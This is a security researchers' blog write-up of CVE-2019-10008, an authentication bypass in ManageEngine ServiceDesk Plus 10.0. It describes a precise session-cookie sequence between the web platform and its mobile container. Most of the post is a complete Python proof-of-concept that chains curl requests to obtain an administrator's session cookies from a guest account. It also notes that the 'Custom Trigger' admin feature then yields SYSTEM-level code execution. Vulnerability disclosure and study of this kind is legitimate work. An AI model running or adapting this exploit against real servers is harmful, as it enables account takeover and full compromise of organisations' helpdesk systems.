Cult of the Flag

Writeups and stuff

© 2022. All rights reserved.

ManageEngine ServiceDesk plus 10.0 Privilege Escalation

05 Apr 2019

Bypassing Authentication

Guest to NT AUTHORITY/SYSTEM SHELL

Ata Hakçıl, Melih Kaan Yıldız

Overview

CVE-2019-10008 Allows any user of ServiceDesk Plus to authenticate as another user. Platform allows for authenticating as any user if session cookies are juggled in a very precise way between the platform and the mobile container.

It is really easy to describe on the top level.

We have 2 cookies we are interested in, JSESSIONID and JSESSIONIDSSO.

As far as i understand the problem, the problem arises from the how mobile container handles sessions differently than the rest of the platform. Below, i’ll try to explain the exact sequence of actions to get the authentication bypass as best as i can.

We will need multiple different values for the same cookie. For example, we will have 5 different value for JSESSIONID, so i will refer to them as JSESSIONID[0] to JSESSIONID[4]. We will also have 2 different JSESSIONIDSSO cookies, JSESSSIONIDSSO[0] and [1].

“+” refers to all the other cookies that we will have one instances of. These include stuff like _rem, and 2 other cookies with hex names and values that im not entirely sure what for.

1) Get request to homepage with no session cookies. It will send Set-Cookie JSESSION[0].

2) Post request to login page with JSESSION[0]. It will redirect to homepage.

3) Get request to homepage with JSESSION[0]. It will send Set-Cookie JSESSION[1] and JSESSIONSSO[0].

4) Get request to mc with JSESSIONID[1] and JSESSIONIDSSO[0]. It will send back JSESSIONID[2].

5) Get request to mc logout with JSESSIONID[2], JSESSIONID[1] and JSESSIONIDSSO[0]. This will logout the mobile session, but not the authenticated jsession cookie.

6) Get request to mc dashboard page with same cookies. This will send back Set-Cookies for JSESSIONID[3] and JSESSIONIDSSO[0]. At this point, our mobile session JSESSION[2] is logged out and replaced with JSESSION[3]-JSESSIONSSO[0], but our JSESSION[1]-JSESSIONSSO[0] is still authenticated with the first credentials.

7) Get request to homepage again to be assigned JSESSIONID[4]-JSESSIONIDSSO[0] pair.

8) Post request to mc login page with JSESSIONID[4], JSESSIONID[3] and JSESSIONIDSSO[0]. This will log JSESSIONID[4]-JSESSIONIDSSO[0] pair in no matter the username or password, and redirect to eventually return JSESSIONID[5]-JSESSIONIDSSO[1] pair. This pair can be used to log in as the second user.

Conclusion

You can log in as any user as long as you know the username and you have one valid username-password. After logging in as user, one can use the “Custom Trigger” option in the admin panel to execute arbitrary code on the server.

You can get from a guest on the website to NT AUTHORITY/SYSTEM on the server.

Vulnerability in action

Exploit Proof of Concept Code (Same script from the video)

Python script below will perform the bypass, and output you the cookies. You can then set your cookies on your browser to get an authenticated session.

import os
import re


##Host ip address + port
host="localhost:8080"

##set to https if needed
url = "http://" + host

##Username with credentials you have
low_username="guest"
low_password="guest"

##username you want to login as
high_username="administrator"

print("\033[1;37mUrl: \033[1;32m" + url)
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)


print("\033[1;32mGetting a session id\033[1;37m")

## Get index page to capture a session id
curl = "curl -i -s -k  -X $'GET' \
    -H $'Host: "+host+"'  -H $'Referer: "+url+"/' -H $'Connection: close'\
    $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]

print("Sessid:")
print(sessid)


print("\033[1;31mLogging in with low privilege user\033[1;37m")


##Attempt login post request 
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
 -H $'Referer: "+url+"/'\
 -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
 -b $'JSESSIONID="+sessid+"' \
 --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
 hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
 dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
 $'"+url+"/j_security_check'"

out = os.popen('/bin/bash -c "' + curl+'"').read()


##Instead of following redirects with -L, following manually because we don't need all the transactions.
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
 -H $'Referer: "+url+"/'\
 -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
 -b $'JSESSIONID="+sessid+"' \
 $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()

print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
print(sessid)
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
print(sessidsso)
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)

grbl2 = []
for cookie in grbl:
	cl = cookie.split('=')
	if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':

		grbl2.append(cl[0])
		grbl2.append(cl[1])

curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/'"


out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]

print("\033[1;32mCaptured secondary sessid.\033[1;37m")
print(sessid2)


print("\033[1;31mDoing the magic step 1.\033[1;37m")
curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
	-H $'Referer: "+url+"/mc/WOListView.do' \
	-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
	-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
	$'"+url+"/mc/jsp/MCLogOut.jsp'"

out = os.popen('/bin/bash -c "' + curl+'"').read()

print("\033[1;31mDoing the magic step 2.\033[1;37m")




curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/jsp/MCDashboard.jsp'"


out = os.popen('/bin/bash -c "' + curl+'"').read()

sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]


curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/'"

out = os.popen('/bin/bash -c "' + curl+'"').read()
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]


curl = "curl -i -s -k -X $'POST' \
    -H $'"+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
    $'"+url+"/mc/j_security_check'"


out = os.popen('/bin/bash -c "' + curl+'"').read()

curl = "curl -i -s -k -X $'GET' \
    -H $'Host: "+host+"' \
    -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
    -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    -H $'Upgrade-Insecure-Requests: 1' \
    -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
    $'"+url+"/mc/jsp/MCDashboard.jsp'"



out = os.popen('/bin/bash -c "' + curl+'"').read()


sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]

print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
print("JSESSIONID=" + sessidhigh)
print("JSESSIONIDSSO=" + sessidssohigh)
print(grbl2[0] + "=" + grbl2[1])
print(grbl2[2] + "=" + grbl2[3])
print("_rem=true")

Related Posts